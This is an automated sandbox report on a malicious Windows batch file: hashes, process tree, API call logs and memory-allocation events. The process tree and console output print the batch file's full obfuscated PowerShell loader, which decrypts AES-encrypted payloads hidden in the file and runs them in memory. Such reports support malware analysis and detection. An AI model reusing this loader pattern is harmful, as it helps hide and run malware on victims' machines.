Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 4, 2025, 12:44 p.m.	May 4, 2025, 12:57 p.m.

Size	580.9KB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`631af5a8e1f4d742039f3b49886e4af9`
SHA256	`3080d7d494b1cf899e6930bdac21cace81dd0b30c93850413f0ff597021d2075`
CRC32	`BB7584FB`
ssdeep	`12288:kuj7UViX5ZPui42OGZ2a7A2BsN8dt8uzovwtZTqUVa7:77UVipZmzp0R2S8xvwyUVa7`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "gGYcLv" C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat
2588
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat
  2660
  - powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr = 'C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat'; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO=[System.Security.Cryptography.Aes]::Create(); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.IV=[System.Convert]::FromBase64String('7AM2yoZ/54dcP3vKSzsqGA=='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Key=[System.Convert]::FromBase64String('QWVElovYpX3jzYwnlNT8Uf/i1KixgzGrFxLrNjNQkUY='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Mode=[System.Security.Cryptography.CipherMode]::CBC;function decrypt_function($param_var){ $tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY=$PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.CreateDecryptor(); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW=$tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY.TransformFinalBlock($param_var, 0, $param_var.Length); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW;}function execute_function($param_var,$param2_var){ $UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH=[System.Reflection.Assembly]::Load([byte[]]$param_var); $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi=$UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH.EntryPoint; $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr;$eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug = [type]::GetType('Syst'+'e'+'m'+'.I'+'O.F'+'i'+'l'+'e');$OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD = [type]::GetType('S'+'ys'+'t'+'e'+'m'+'.E'+'nv'+'i'+'ro'+'n'+'me'+'n'+'t');$myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA = $eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug::ReadAllText($kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr);$FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN = $OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD::NewLine;$ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD = $myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA.Split($FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN);$mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd = $ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD;foreach ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe in $mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd) { if ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.StartsWith(':: ')) { $rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD=$pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.Substring(3); break; }}$payloads_var=[string[]]$rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD.Split('\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    2748

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 4, 2025, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:44 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 4, 2025, 12:44 p.m.			0	0

Command line console output was observed (41 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: Exception calling "Invoke" with "2" argument(s): "Could not load file or assemb console_handle: 0x00000023	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: ly 'System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' console_handle: 0x0000002f	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: or one of its dependencies. The system cannot find the file specified." console_handle: 0x0000003b	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: At line:1 char:1240 console_handle: 0x00000047	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: + $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr = 'C:\Users\test22\AppData\Loc console_handle: 0x00000053	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: al\Temp\Dtaqbmza.bat'; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO=[System.Securi console_handle: 0x0000005f	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: ty.Cryptography.Aes]::Create(); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.IV=[S console_handle: 0x0000006b	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: ystem.Convert]::FromBase64String('7AM2yoZ/54dcP3vKSzsqGA=='); $PvdIqjptkwzRWjPA console_handle: 0x00000077	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: pNtECTNUfvNJCZDVulwVksGO.Padding=[System.Security.Cryptography.PaddingMode]::PK console_handle: 0x00000083	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: CS7; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Key=[System.Convert]::FromBase64 console_handle: 0x0000008f	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: String('QWVElovYpX3jzYwnlNT8Uf/i1KixgzGrFxLrNjNQkUY='); $PvdIqjptkwzRWjPApNtECT console_handle: 0x0000009b	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: NUfvNJCZDVulwVksGO.Mode=[System.Security.Cryptography.CipherMode]::CBC;function console_handle: 0x000000a7	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: decrypt_function($param_var){ $tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY=$PvdIq console_handle: 0x000000b3	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: jptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.CreateDecryptor(); $kwBLIWdZkAnbPLsOUifQJAE console_handle: 0x000000bf	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: pBtAmkjvSJDKZefCW=$tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY.TransformFinalBlock console_handle: 0x000000cb	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: ($param_var, 0, $param_var.Length); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW;} console_handle: 0x000000d7	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: function execute_function($param_var,$param2_var){ $UrBOqNGxlRQhCPuWAZwTvDzVkry console_handle: 0x000000e3	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: TmjAebiEZIMYH=[System.Reflection.Assembly]::Load([byte[]]$param_var); $cKWcvbfZ console_handle: 0x000000ef	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: ZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi=$UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH.Entr console_handle: 0x000000fb	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: yPoint; $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi.Invoke <<<< ($null, $param2_v console_handle: 0x00000107	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: ar);}$host.UI.RawUI.WindowTitle = $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWy console_handle: 0x00000113	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: r;$eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug = [type]::GetType('Syst'+'e'+'m'+'. console_handle: 0x0000011f	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: I'+'O.F'+'i'+'l'+'e');$OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD = [type]::GetTy console_handle: 0x0000012b	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: pe('S'+'ys'+'t'+'e'+'m'+'.E'+'nv'+'i'+'ro'+'n'+'me'+'n'+'t');$myUaQQgClnhcjZtqz console_handle: 0x00000137	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: UKJVKOEYEJjImKufuMPRkkA = $eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug::ReadAllTex console_handle: 0x00000143	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: t($kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr);$FEjXnkEavAlLMQmBKpcmhXTZCMWO console_handle: 0x0000014f	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: mDypKkdrBQqN = $OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD::NewLine;$ZINhbYHoilfC console_handle: 0x0000015b	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: hYtHKkvAnQNScVbCNVZTYomyjMXD = $myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA.Split( console_handle: 0x00000167	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: $FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN);$mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAG console_handle: 0x00000173	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: qIRLd = $ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD;foreach ($pmGVnSEeJSyQoLrtSRO console_handle: 0x0000017f	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: fDgynLHRLMHoyGZKArEUe in $mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd) { if ($pmGV console_handle: 0x0000018b	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: nSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.StartsWith(':: ')) { $rsZKYruhVLafpWQNRSCa console_handle: 0x00000197	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: MXzhWSNnJIatoDkiztmD=$pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.Substring(3); br console_handle: 0x000001a3	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: eak; }}$payloads_var=[string[]]$rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD.Split( console_handle: 0x000001af	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: '\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var console_handle: 0x000001bb	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: [0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_va console_handle: 0x000001c7	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: r[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[s console_handle: 0x000001d3	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: tring[]] ('')); console_handle: 0x000001df	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001eb	1	1
WriteConsoleW May 4, 2025, 12:44 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation console_handle: 0x000001f7	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747120 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007475a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007476a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007472a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007472a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007472a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007472a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007472a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007472a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 4, 2025, 12:44 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 148 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
